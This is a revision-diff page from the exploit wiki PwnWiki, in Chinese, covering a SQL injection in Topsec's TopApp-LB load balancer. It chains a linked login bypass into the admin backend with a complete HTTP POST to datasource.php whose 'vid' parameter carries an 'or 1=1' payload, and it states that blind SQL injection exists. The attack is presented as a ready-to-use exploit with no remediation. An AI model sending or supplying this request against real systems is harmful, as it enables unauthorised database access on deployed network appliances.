Difference between revisions of "天融信負載均衡TopApp-LB Sql注入漏洞"
From PwnWiki
(Created page with "<languages /> <translate> ==漏洞利用== </translate> <translate> 利用 [https://www.pwnwiki.org/index.php?title=%E5%A4%A9%E8%9E%8D%E4%BF%A1%E8%B2%A0%E8%BC%89%E5%9D%87%E...") |
(Marked this version for translation) |
||
| Line 2: | Line 2: | ||
<translate> | <translate> | ||
| − | ==漏洞利用== | + | ==漏洞利用== <!--T:1--> |
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:2--> | ||
利用 [https://www.pwnwiki.org/index.php?title=%E5%A4%A9%E8%9E%8D%E4%BF%A1%E8%B2%A0%E8%BC%89%E5%9D%87%E8%A1%A1TopApp-LB%E4%BB%BB%E6%84%8F%E7%99%BB%E9%99%B8 天融信負載均衡TopApp-LB任意登陸] 進入後台,提交以下數據包: | 利用 [https://www.pwnwiki.org/index.php?title=%E5%A4%A9%E8%9E%8D%E4%BF%A1%E8%B2%A0%E8%BC%89%E5%9D%87%E8%A1%A1TopApp-LB%E4%BB%BB%E6%84%8F%E7%99%BB%E9%99%B8 天融信負載均衡TopApp-LB任意登陸] 進入後台,提交以下數據包: | ||
</translate> | </translate> | ||
| Line 29: | Line 30: | ||
<translate> | <translate> | ||
| + | <!--T:3--> | ||
存在SQL盲注。 | 存在SQL盲注。 | ||
</translate> | </translate> | ||
Latest revision as of 16:26, 22 March 2021
漏洞利用
利用 天融信負載均衡TopApp-LB任意登陸 進入後台,提交以下數據包:
POST /acc/clsf/report/datasource.php HTTP/1.1 Host: Connection: close Accept: text/javascript, text/html, application/xml, text/xml, */* X-Prototype-Version: 1.6.0.3 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=ijqtopbcbmu8d70o5t3kmvgt57 Content-Type: application/x-www-form-urlencoded Content-Length: 201 t=l&e=0&s=t&l=1&vid=2147483647 or 1=1&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=@。。
存在SQL盲注。
